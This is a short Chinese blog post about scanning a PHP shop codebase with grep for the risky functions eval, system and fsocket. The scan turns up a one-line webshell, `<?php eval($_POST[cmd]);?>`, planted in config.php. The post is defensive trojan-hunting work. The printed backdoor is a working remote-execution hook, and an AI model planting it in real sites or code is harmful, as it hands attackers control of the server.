1.php的漏洞扫描简单得很,无非就是逐个检查文件中是否有eval,system,fsocket等高危函数
[root@server100 shop]# grep -l "eval" `find . -name "*.php"`
./cycle_p_w_picpath.php
./config.php
./feed.php
./admin/privilege.php
./admin/includes/cls_phpzip.php
./admin/includes/init.php
./admin/role.php
./data/global.php
./languages/en_us/payment/kuaiqian.php
./includes/shopex_json.php
./includes/fckeditor/editor/filemanager/connectors/php/basexml.php
./includes/cls_template.php
./includes/lib_base.php
./includes/cls_captcha.php
./install/cloud.php
./temp/compiled/admin/menu.htm.php
[root@server100 shop]# grep -n "eval" config.php
1:<?php eval($_POST[cmd]);?>
[root@server100 shop]# grep -l "fsocket" `find . -name "*.php"`
./languages/zh_tw/admin/common.php
./languages/zh_cn/admin/common.php
[root@server100 shop]# grep -n "fsocket" languages/zh_tw/admin/common.php
332:$_LANG['disabled_fsockopen'] = '服務器已禁用 fsocketopen 函數。';
[root@server100 shop]# grep -l "system" `find . -name "*.php"`
./admin/flashplay.php
./admin/includes/lib_main.php
./admin/includes/inc_menu.php
./languages/zh_tw/admin/navigator.php
./languages/zh_tw/admin/index.php
./languages/zh_tw/admin/common.php
./languages/zh_tw/admin/flashplay.php
./languages/zh_tw/admin/convert.php
./languages/zh_tw/common.php
./languages/zh_cn/admin/navigator.php
./languages/zh_cn/admin/index.php
./languages/zh_cn/admin/common.php
./languages/zh_cn/admin/flashplay.php
./languages/zh_cn/admin/convert.php
./languages/zh_cn/common.php
./languages/en_us/admin/articlecat.php
./languages/en_us/admin/license.php
./languages/en_us/admin/navigator.php
./languages/en_us/admin/index.php
./languages/en_us/admin/priv_action.php
./languages/en_us/admin/common.php
./languages/en_us/admin/flashplay.php
./languages/en_us/admin/integrate.php
./languages/en_us/admin/article_auto.php
./languages/en_us/admin/convert.php
./languages/en_us/admin/goods.php
./languages/en_us/admin/shop_config.php
./languages/en_us/admin/goods_auto.php
./languages/en_us/admin/users.php
./languages/en_us/common.php
./languages/en_us/payment/kuaiqian.php
./languages/en_us/payment/ips.php
./languages/en_us/payment/express.php
./languages/en_us/user.php
./includes/lib_main.php
./includes/lib.debug.php
./includes/modules/payment/paypal.php
./install/index.php
./install/auto_index.php
./install/templates/setting.php
./install/templates/checking_content.php
./install/templates/setting_content.php
./install/languages/zh_tw.php
./install/languages/zh_cn.php
./install/languages/en_us.php
./install/includes/lib_installer.php
./install/includes/lib_auto_installer.php
./temp/compiled/respond.dwt.php
./temp/compiled/message.dwt.php
./temp/compiled/admin/start.htm.php
./demo/index.php
./demo/templates/readme.php
./demo/languages/zh_cn_gbk.php
./demo/languages/zh_cn_utf-8.php
./demo/languages/zh_tw_utf-8.php
./demo/languages/en_us_utf-8.php
查找木马
原创
©著作权归作者所有:来自51CTO博客作者羡慕不来的原创作品,谢绝转载,否则将追究法律责任
下一篇:grep -l用法
提问和评论都可以,用心的回复会被更多人看到
评论
发布评论
相关文章
-
查找算法之折半查找+分块查找
数据结构之查找算法基本概念常见的查找算法折半查找概念算法折半查找树的构造基本概念查找表:由同一种类型的数据元素(记录
c++ c语言 折半查找 分块查找 查找算法 -
201,查找-顺序查找
查找算法中顺序查找算是最简单的了,无论是有序的还是无序的都可以,也不需要排序,只需要一个个对比即可,但其实效
数据 i++ 顺序查找 查找算法 斐波那契查找 -
205,查找-分块查找
分块查找是折半查找和顺序查找的一种改进方法,分块查找由于只要求索引表是有序的,对块内节点没有排序要求,因此特
分块查找 i++ 折半查找 顺序查找 数组 -
207,查找-其他查找
一,二叉树查找除了前面介绍的几个查找算法以外,还有一种叫二叉树查找,二叉树查找比较简单,我们知道二叉树的节点
二叉树 结点 链表 红黑树 子树 -
顺序查找和折半查找
/**************************************************** @title: 数据结构实验 @nam
顺序查找和折半查找 修改算法把查找过程中所作比较及其结果b 折半查找 顺序查找 查找算法
